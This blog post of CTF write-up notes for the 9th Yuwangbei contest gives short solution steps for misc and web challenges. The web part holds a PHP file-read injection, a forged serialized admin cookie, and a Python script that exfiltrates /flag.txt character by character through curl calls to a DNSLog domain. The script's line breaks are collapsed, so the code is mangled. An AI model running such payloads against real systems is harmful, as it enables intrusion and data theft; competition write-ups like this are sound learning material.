当前位置: 首页 > ds >正文

第九届御网杯做题笔记(misc和web)(部分题其他的要么不会要么可以用gpt可以秒)

一。Misc

ez_picture

得密码为999999999

解码得一张图片

放随波逐流里

easy_misc

套娃

放随波逐流提取文件

解压

再放随波逐流中分离文件

光隙中的寄生密钥

分离文件

得到zip文件爆破

被折叠的显影图纸

二。Web

YWB_Web_xff

YWB_Web_命令执行过滤绕过

输入cmd=var_dump(file('/tmp/flag.nisp'));

YWB_Web_未授权访问

将cooik改为

O%3A5%3A%22Admin%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A5%3A%22admin%22%3Bs%3A7%3A%22isAdmin%22%3Bb%3A1%3B%7D

easyweb

dnslog:DNSLog Platform

用脚本多次写

import subprocess
import time# 用户自定义配置
target_url = "http://47.105.113.86:40005"          # 目标地址
dnslog_domain = "sb6n96.dnslog.cn"                 # 你的 DNSLOG 域名
max_length = 50                                     # 假设 flag 最多 50 字符
delay = 2                                           # 每次请求间隔秒数(防止被封)print("开始泄露 /flag.txt,请实时查看 DNSLog 平台:\n")for i in range(1, max_length + 1):# 构造 payload(注意 curl 用双大括号包裹变量)cmd = f'c=$(cut -c{i} /flag.txt); curl ${{c}}{i}.{dnslog_domain}'# 构造 curl 命令 POST 数据post_data = f'cmd={cmd}'curl_cmd = ["curl", "-s", "-X", "POST",target_url,"-d", post_data]print(f"[+] 尝试泄露第 {i} 个字符...")try:subprocess.run(curl_cmd, check=True)except subprocess.CalledProcessError as e:print(f"[-] 请求失败:{e}")time.sleep(delay)

将得到的一一打印即可得出flag为flag{5ki185ca8l1i}

http://www.xdnf.cn/news/12198.html

相关文章:

  • redis进入后台操作、查看key、删除key
  • PostgreSQL-基于PgSQL17和11版本导出所有的超表建表语句
  • JavaScript中判断两个对象是否相同(所有属性的值是否都相同)
  • JavaWeb简介
  • Ansible常用模块和使用技巧
  • 学习笔记(23): 机器学习之数据预处理Pandas和转换成张量格式[1]
  • 前端css外边距塌陷(Margin Collapse)现象原因和解决方法
  • 【DAY39】图像数据与显存
  • Java 中创建线程主要有三种方式
  • Fast-dLLM:为扩散大模型按下加速键
  • 关于项目多语言化任务的概述
  • Manus AI 现在可以生成短片了
  • 电镀机的阳极是什么材质?
  • Windows系统下npm报错node-gyp configure got “gyp ERR“解决方法
  • 道可云人工智能每日资讯|人工智能赋能广西生态环境保护计划发布
  • JavaWeb:前端工程化-TS(TypeScript)
  • 鸿蒙任务项设置案例实战
  • 离散化思想
  • 链路聚合+VRRP
  • python入门(1)
  • 【.net core】【watercloud】树形组件combotree导入及调用
  • Visual Studio C++ 调试日志与异常定位指南
  • 时序替换实时?是否必要
  • 第16届蓝桥STEMA真题剖析-2025年4月13日Scratch初/中级组
  • OurBMC技术委员会2025年二季度例会顺利召开
  • Java创建多线程的四种方式
  • 使用osqp求解简单二次规划问题
  • 四元数:从理论基础到实际应用的深度探索
  • NNLM和word2vec的区别
  • 2025年文件加密软件推荐,最新款文档加密系统排名